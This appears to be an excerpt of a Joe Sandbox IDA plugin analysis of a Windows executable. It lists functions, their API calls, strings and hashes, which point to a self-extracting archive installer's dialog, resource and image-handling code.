Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303

_wtol.MSVCRT ref: 00404CDF
_wtol.MSVCRT ref: 00404CFB

Strings

GUIFlags, xrefs: 00404C41, 00404C46, 00404C62
Progress, xrefs: 00404BCA
Title, xrefs: 00404B14
ExtractTitle, xrefs: 00404BB2
ExtractDialogText, xrefs: 00404CB0
CancelPrompt, xrefs: 00404D34
ExtractDialogWidth, xrefs: 00404CC1
ExtractPathText, xrefs: 00404D1C
WarningTitle, xrefs: 00404B9A
GUIMode, xrefs: 00404BF7
MiscFlags, xrefs: 00404C74, 00404C79, 00404C95
ExtractPathWidth, xrefs: 00404CE8
ErrorTitle, xrefs: 00404B82
OverwriteMode, xrefs: 00404C24
ExtractCancelText, xrefs: 00404CA4
ExtractPathTitle, xrefs: 00404D04

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle
API String ID: 2725485552-1675048025
Opcode ID: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
Instruction ID: efab4658e061a586f4080eb8d96ca385680a2b42527defa3ddb57561e196b8fa
Opcode Fuzzy Hash: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
Instruction Fuzzy Hash: F151B8F6E01104BADB11AF616D8ADEF36ACDE41708725443FF904F22C2E6BD8E85466D

Function 00401EB2 Relevance: 31.6, APIs: 21, Instructions: 121windowCOMMON

Download Yara Rule

APIs

GetWindowDC.USER32(00000000), ref: 00401EBE
GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
GetObjectW.GDI32(?,00000018,?), ref: 00401F12
MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
CreateCompatibleDC.GDI32(?), ref: 00401F35
CreateCompatibleDC.GDI32(?), ref: 00401F3C
SelectObject.GDI32(00000000,?), ref: 00401F4A
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
SelectObject.GDI32(00000000,00000000), ref: 00401F60
SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
SelectObject.GDI32(00000000,?), ref: 00401F9D
SelectObject.GDI32(00000000,?), ref: 00401FA3
DeleteDC.GDI32(00000000), ref: 00401FAC
DeleteDC.GDI32(00000000), ref: 00401FAF
ReleaseDC.USER32(00000000,?), ref: 00401FB6
ReleaseDC.USER32(00000000,?), ref: 00401FC5
CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401FD2

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
String ID:
API String ID: 3462224810-0
Opcode ID: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
Instruction ID: f87cdcd409c0e6d8f104c470e9418599ce0c3db21cc9cfda4b735dde8093d4f2
Opcode Fuzzy Hash: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
Instruction Fuzzy Hash: B0310676D40208FFDF115BE1DD48EEF7FB9EB88761F108066FA04A61A0C6754A50AFA4

Function 00401FDD Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 120windowcommemoryCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000040), ref: 00401FEF
lstrcmpiA.KERNEL32(?,STATIC), ref: 00402006
GetWindowLongW.USER32(?,000000F0), ref: 00402019
GetMenu.USER32(?), ref: 0040202E

Part of subcall function 00401DC9: GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
Part of subcall function 00401DC9: SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
Part of subcall function 00401DC9: LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
Part of subcall function 00401DC9: LockResource.KERNEL32(00000000), ref: 00401E2B

GlobalAlloc.KERNEL32(00000040,00000010), ref: 00402060
memcpy.MSVCRT(00000000,00000000,00000010), ref: 0040206D
CoInitialize.OLE32(00000000), ref: 00402076
CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00402082
OleLoadPicture.OLEAUT32(?,00000000,00000000,00416E50,?), ref: 004020A7
GlobalFree.KERNEL32(00000000), ref: 004020B7

Part of subcall function 00401EB2: GetWindowDC.USER32(00000000), ref: 00401EBE
Part of subcall function 00401EB2: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
Part of subcall function 00401EB2: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
Part of subcall function 00401EB2: GetObjectW.GDI32(?,00000018,?), ref: 00401F12
Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F35
Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F3C
Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F4A
Part of subcall function 00401EB2: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
Part of subcall function 00401EB2: SelectObject.GDI32(00000000,00000000), ref: 00401F60
Part of subcall function 00401EB2: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
Part of subcall function 00401EB2: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
Part of subcall function 00401EB2: GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F9D
Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401FA3
Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAC
Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAF
Part of subcall function 00401EB2: ReleaseDC.USER32(00000000,?), ref: 00401FB6

GetObjectW.GDI32(00000000,00000018,?), ref: 004020E9
SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 004020FD
SendMessageW.USER32(00000010,00000172,00000000,?), ref: 0040210F
GlobalFree.KERNEL32(00000000), ref: 00402124

Strings

STATIC, xrefs: 00401FFD
IMAGES, xrefs: 00402038

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
String ID: IMAGES$STATIC
API String ID: 4202116410-1168396491
Opcode ID: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
Instruction ID: 87364bf851807a9d3783278cfb79ffb10547d227827cc6f6944e766e6ae994b9
Opcode Fuzzy Hash: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
Instruction Fuzzy Hash: 00418F31900108FFCB119FA0DC4CEEF7F79EF49741B008065FA05A61A0D7798A55DB64

Function 00408B36 Relevance: 27.1, APIs: 18, Instructions: 144windowcomtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE

GetDlgItem.USER32(?,000004B8), ref: 00408B63
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408B72
GetDlgItem.USER32(?,000004B5), ref: 00408BB9
GetWindowLongW.USER32(00000000,000000F0), ref: 00408BBE
GetDlgItem.USER32(?,000004B5), ref: 00408BCE
SetWindowLongW.USER32(00000000), ref: 00408BD1
GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 00408BF7
EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408C09
GetDlgItem.USER32(?,000004B4), ref: 00408C13
SetFocus.USER32(00000000), ref: 00408C16
SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408C45
CoCreateInstance.OLE32(00416E80,00000000,00000001,00416B08,?), ref: 00408C69
GetDlgItem.USER32(?,00000002), ref: 00408C86
IsWindow.USER32(00000000), ref: 00408C89
GetDlgItem.USER32(?,00000002), ref: 00408C99
EnableWindow.USER32(00000000), ref: 00408C9C
GetDlgItem.USER32(?,000004B5), ref: 00408CB0
ShowWindow.USER32(00000000), ref: 00408CB3

Part of subcall function 00407A3B: GetDlgItem.USER32(?,000004B6), ref: 00407A49

Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: Item$Window$Long$MessageSendSystem$EnableHandleLoadMenuMetricsModuleShow$CreateFocusIconImageInstanceTimer
String ID:
API String ID: 1057135554-0
Opcode ID: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
Instruction ID: 260128caa5a256333788f33680fc13296caa9e9ac1428af8f37f53b95f277c78
Opcode Fuzzy Hash: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
Instruction Fuzzy Hash: E1415B71644708EBDA246F26DE49F977BADEB80B54F00853DF555A62E0CF79AC00CA2C

Function 004072F5 Relevance: 24.3, APIs: 16, Instructions: 294COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B3), ref: 0040731D
GetWindowLongW.USER32(00000000,000000F0), ref: 00407322
GetDlgItem.USER32(?,000004B4), ref: 00407359
GetWindowLongW.USER32(00000000,000000F0), ref: 0040735E
GetSystemMetrics.USER32(00000010), ref: 004073E0
GetSystemMetrics.USER32(00000011), ref: 004073E6
GetSystemMetrics.USER32(00000008), ref: 004073ED
GetSystemMetrics.USER32(00000007), ref: 004073F4
GetParent.USER32(?), ref: 00407418
GetClientRect.USER32(00000000,?), ref: 0040742A
ClientToScreen.USER32(?,?), ref: 0040743D
SetWindowPos.USER32(?,00000000,?,?,?,00000000,00000004), ref: 004074A3
GetClientRect.USER32(?,?), ref: 0040753D

Part of subcall function 004072C6: GetDlgItem.USER32(?,?), ref: 004072E4
Part of subcall function 004072C6: SetWindowPos.USER32(00000000), ref: 004072EB

ClientToScreen.USER32(?,?), ref: 00407446

Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9

GetSystemMetrics.USER32(00000008), ref: 004075C2
GetSystemMetrics.USER32(00000007), ref: 004075C9

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
String ID:
API String ID: 747815384-0
Opcode ID: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
Instruction ID: 27a08476a10642596e4b9d74cae09f61027c0f3cc76a3fdd313218faaf2b79ea
Opcode Fuzzy Hash: ae888a572df34d8200fbb5f065eb0fa3bdccac2998dde38db5d0dc60573d1a76
Instruction Fuzzy Hash: 69A13C71E04609AFDB14CFB9CD85AEEBBF9EB48304F148529E905F3291D778E9008B65

Function 0041382F Relevance: 16.6, APIs: 11, Instructions: 111COMMON

Download Yara Rule

APIs

__set_app_type.MSVCRT ref: 0041385C
__p__fmode.MSVCRT ref: 00413871
__p__commode.MSVCRT ref: 0041387F
__setusermatherr.MSVCRT ref: 004138AB
_initterm.MSVCRT ref: 004138C1
__getmainargs.MSVCRT ref: 004138E4
_initterm.MSVCRT ref: 004138F4
GetStartupInfoA.KERNEL32(?), ref: 00413933
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00413957
exit.MSVCRT ref: 00413967
_XcptFilter.MSVCRT ref: 00413979

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
Instruction ID: 5122df4da7c12dbd5cee10cc3a7810c6062e66137140a5a107582b8573bb02de
Opcode Fuzzy Hash: eb2cf8166488941d166303a2e7f1762bb68f066f698331e9c3b40d0cb6435919
Instruction Fuzzy Hash: BA415BB1D50744EFDB219FA4D845BEA7BB8EB49711F20412FE44197391C7B84A81CB58

Function 00407823 Relevance: 16.6, APIs: 11, Instructions: 87windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00407831
GetWindowLongW.USER32(00000000), ref: 00407838
DefWindowProcW.USER32(?,?,?,?), ref: 0040784E
CallWindowProcW.USER32(?,?,?,?,?), ref: 0040786B
GetSystemMetrics.USER32(00000031), ref: 0040787D
GetSystemMetrics.USER32(00000032), ref: 00407884
GetWindowDC.USER32(?), ref: 00407896
GetWindowRect.USER32(?,?), ref: 004078A3
DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 004078D7
ReleaseDC.USER32(?,00000000), ref: 004078DF

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
String ID:
API String ID: 2586545124-0
Opcode ID: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
Instruction ID: 0b69cac6d3a88e426d6ff8758e07239202df165225e4a2dce5f130aa01be730a
Opcode Fuzzy Hash: 127c443f7cc8da3ca14b37cbf5cd9ef0ee5655b57506046fb41dccdc85244fb6
Instruction Fuzzy Hash: E021F97650060AEFCB01AFA8DD48EDF3BA9FB48351F008525F915E6190CB74E910DB65

Function 00403BA2 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 92COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403BE9

Part of subcall function 00402A0D: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00402A80

??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,-00000001,?,?,00000000,-00000001,;!@InstallEnd@!,;!@Install@!UTF-8!,?,00000000,00000000), ref: 00403C0F
wsprintfA.USER32 ref: 00403C31
wsprintfA.USER32 ref: 00403C5E

Strings

:Language:%u, xrefs: 00403C58
:%hs, xrefs: 00403C2B
;!@Install@!UTF-8!, xrefs: 00403BAE
;!@InstallEnd@!, xrefs: 00403BBD

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ??3@$wsprintf
String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 2704270482-695273242
Opcode ID: 01de58c80c2895727725e476a1aa16912d604cd70d675cdd3169202dfa8a1add
Instruction ID: 9d93b3f3b108edfb0f00dda14ecc0a1ac1becc65812ee6aaf2e5fef7c6953118
Opcode Fuzzy Hash: 01de58c80c2895727725e476a1aa16912d604cd70d675cdd3169202dfa8a1add
Instruction Fuzzy Hash: 9D21B472B00519ABDB01FAA5CD85EFD73ADAB48704F14802FF504F32C1CB789A068B99

Function 00407028 Relevance: 13.5, APIs: 9, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004B3), ref: 0040703C
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 0040704F
GetDlgItem.USER32(?,000004B4), ref: 00407059
SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00407061
SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00407071
GetDlgItem.USER32(?,?), ref: 0040707A
SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 00407082
GetDlgItem.USER32(?,?), ref: 0040708B
SetFocus.USER32(00000000,?,?,00000000,00407F9B,000004B3,00000000,?,000004B3), ref: 0040708E

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: ItemMessageSend$Focus
String ID:
API String ID: 3946207451-0
Opcode ID: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
Instruction ID: ac3eac6f6a5d23dfb33c6f00e103186fc87c4e398078883204236830092b285c
Opcode Fuzzy Hash: 83591c7242e4733216ec8120015317eeb511db45ace1dd7a81700241ea92acb2
Instruction Fuzzy Hash: 9BF04F72240708BBEA212B61DD86F9BBA5EDF80B54F018425F340650F0CBF3AC109A28

Function 00407649 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(uxtheme,?,004089A8,000004B1,00000000,?,?,?,?,?,00408AB5), ref: 00407651
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00407662
GetWindow.USER32(?,00000005), ref: 0040767B
GetWindow.USER32(00000000,00000002), ref: 00407691

Strings

uxtheme, xrefs: 0040764A
hA, xrefs: 00407684
SetWindowTheme, xrefs: 0040765C

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: Window$AddressLibraryLoadProc
String ID: hA$SetWindowTheme$uxtheme
API String ID: 324724604-1539679821
Opcode ID: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
Instruction ID: 96ee7b80554ba3a4b118cc962054e33398f60e347ce36d0b88b8db399e3538ac
Opcode Fuzzy Hash: 80bf877f136b08889d9e5f4a8a5d9d855f6c5cd229e99b8175ebd185f35b86be
Instruction Fuzzy Hash: 3FF02772E46F2533C231136A6C48F9B669C9F85B707064536B805F7281DAAAEC0081EC

Function 0040769E Relevance: 12.1, APIs: 8, Instructions: 69COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,00419438,00000160), ref: 004076BD
SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 004076DC
GetDC.USER32(00000000), ref: 004076E7
GetDeviceCaps.GDI32(00000000,0000005A), ref: 004076F3
MulDiv.KERNEL32(?,00000048,00000000), ref: 00407702
ReleaseDC.USER32(00000000,?), ref: 00407710
GetModuleHandleW.KERNEL32(00000000), ref: 00407738
DialogBoxIndirectParamW.USER32(00000000,?,?,Function_00006EE0), ref: 0040776D

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
String ID:
API String ID: 2693764856-0
Opcode ID: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
Instruction ID: 6b4ef5ea24060658d5863b79bc38f96fa154aaa2e89c1bfb3ba309e5e1f78dd9
Opcode Fuzzy Hash: f32e2efff65d8c7350818911c104fb39d10c633f79d1afb389a2c80124d65094
Instruction Fuzzy Hash: 8021D1B1900618FFD7215BA19C88EEB7B7CFB44741F0000B6FA09A2290D7749E848F69

Function 0040720C Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 0040721C
GetSystemMetrics.USER32(0000000B), ref: 00407238
GetSystemMetrics.USER32(0000003D), ref: 00407241
GetSystemMetrics.USER32(0000003E), ref: 00407249
SelectObject.GDI32(?,?), ref: 00407266
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00407281
SelectObject.GDI32(?,?), ref: 004072A7
ReleaseDC.USER32(?,?), ref: 004072B6

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd

Similarity

API ID: MetricsSystem$ObjectSelect$DrawReleaseText
String ID:
API String ID: 2466489532-0
Opcode ID: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
Instruction ID: 0ddf9739e914bca3a0fdf19f43e85ccaed600b4ac583c8006899e124ffc187c2
Opcode Fuzzy Hash: 30350efc689a7719ea887eb8f4495072b611486211cb3e9d7370f6f07856f78e
Instruction Fuzzy Hash: 3C216572900609EFCB018FA5DD44A8EBFF4EF48364F20C4AAE419A72A0C335AA50DF40

Function 00408196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102windowCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081D0
GetDlgItem.USER32(?,000004B8), ref: 004081EE
SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00408200
wsprintfW.USER32 ref: 0040821E
??3@YAXPAX@Z.MSVCRT(?), ref: 004082B6

Strings

%d%%, xrefs: 00408218

Memory Dump Source

Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

